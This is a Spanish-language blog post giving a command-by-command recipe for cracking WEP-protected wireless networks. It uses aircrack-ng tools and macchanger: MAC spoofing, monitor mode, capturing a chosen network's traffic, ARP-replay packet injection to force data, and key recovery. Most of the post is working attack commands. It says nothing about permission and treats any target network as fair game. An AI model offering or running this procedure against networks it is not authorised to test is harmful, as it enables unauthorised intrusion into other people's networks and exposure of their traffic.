Bueno, realmente es uno de los temas más comunes el como “crackear” redes inalámbricas que manejan de cifrado WEP y hoy gracias a los avances (de desarrollo de software y hardware… más el trabajo de la comunidad involucrada) es un método realmente sencillo que no toma mucho tiempo. Sencillo? realmente, la utilización de las herramientas es sencilla, pero no significa que la base teórica lo sea. En fin, solo quiero comentar lo que se necesita de forma “genérica” para “crackear” una red inalámbrica.

Digo de forma genérica, por que hay mucha gente que a lo mejor no conoce backtrack, o wifislax … de hecho en lo personal yo prefiero tener en mi computadora los programas que necesito, la distribución Linux que manejo en mi computadora portátil es Ubuntu y en la de escritorio es Debian. Prefiero tener instalados en mi sistema operativo base los programas a estar utilizando Live-Cds aunque de hecho… me gusta basarme de ellos para saber que herramientas son interesantes, en fin.

En Ubuntu, creo que los programas están en los repositorios asi que no hay mucho lio.

La formula genérica es:

- Tener la suite de herramientas de aircrack-ng : http://www.aircrack-ng.org

- Tener el macchanger

- Que la tarjeta soporte la inyección de paquetes y el modo monitor.

De ahí en más, los pasos a manera de receta son:

# airmon-ng

# airmon-ng stop wlan0

# ifconfig wlan0 down

# macchanger –mac 00:11:22:33:44:55 wlan0

# airmon-ng start wlan0

# airodump-ng wlan0

Apretamos para detener push ctrl+c

  • Copiamos el BSSID de la red que queramos crackear

# airodump-ng -c (numero del canal) -w wep123 –bssid (bssid) wlan0

- mientras pwr sea mas grande, mejor

- el #Data debe ser alrededor de 10mil, para forzarlo:

#aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0

#aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0

Ahora esperamos a que nuestro #Data sobrepase los 20mil y al hacerlo ejecutar…

# aircrack-ng -n 64 -b (bssid) wep123-01.cap

Nota: El cap file esta en la carpeta home, puse wep123-01.cap pensando en que fue el primer intento.

Listo! sin tantas complicaciones.

Fuentes:

http://richieblog.wordpress.com/2008/07/31/crackear-una-wep-con-backtrack-3-tan-facil-poner-en-jaque-a-la-inalambrica/